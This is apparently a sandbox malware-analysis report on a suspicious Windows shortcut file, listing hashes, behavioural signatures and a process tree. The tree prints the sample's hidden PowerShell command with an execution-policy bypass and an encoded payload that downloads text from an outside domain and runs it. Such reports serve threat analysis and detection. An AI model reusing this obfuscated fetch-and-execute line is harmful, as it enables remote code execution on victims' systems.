Analysis
-
max time kernel
121s
-
max time network
121s
-
platform
windows7_x64
-
resource
win7-20240221-en
-
resource tags
arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
-
submitted
05-04-2024 08:43
Static task
static1
Behavioral task
behavioral1
Sample
DOC527 - 527527.lnk
Resource
win7-20240221-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
DOC527 - 527527.lnk
Resource
win10v2004-20240226-en
8 signatures
150 seconds
General
-
Target
DOC527 - 527527.lnk
-
Size
9KB
-
MD5
8f67aaa7b8bf4df78de954a16bcf67ca
-
SHA1
2cedea1467518ab950820767b6f546344d228305
-
SHA256
b8a5cb1a0bc2ddd5b12f29781391ce38806b8dd0af28a0612d71a58063250ae8
-
SHA512
09519377b6dbedb528e4c96342b4c28ad71e2a286bb61866daea52d8a657969e4d53685cc14e122e8f3eb24e9ca5e0da6d77b2786d502b1b9a056c7154e83934
-
SSDEEP
192:8z55hm3MSBf6OY1tvnT1wEuz4+nCWLFf3m/9h0yAE7oxMdPDTJvs3DoTNxHJ6:u5vcMS5otvnT1w7p9WIBE7UkpoyHJ6
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exe (PID 2632)
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exe (PID 2632): Token: SeDebugPrivilege
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exe (PID 2992) wrote to memory of powershell.exe (PID 2632)
cmd.exe (PID 2992) wrote to memory of powershell.exe (PID 2632)
cmd.exe (PID 2992) wrote to memory of powershell.exe (PID 2632)
Processes
-
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\DOC527 - 527527.lnk"
- Suspicious use of WriteProcessMemory
PID:2992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 2992)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -WindowStyle Hidden -Enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBpAG0AYQBuAGkAawB1AHUALgBjAG8AbQAvAGQAbwBuAGUALgB0AHgAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAIAB8ACAAaQBOAHYATwBrAEUALQBFAHgAUAByAGUAUwBzAGkATwBuAA==
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632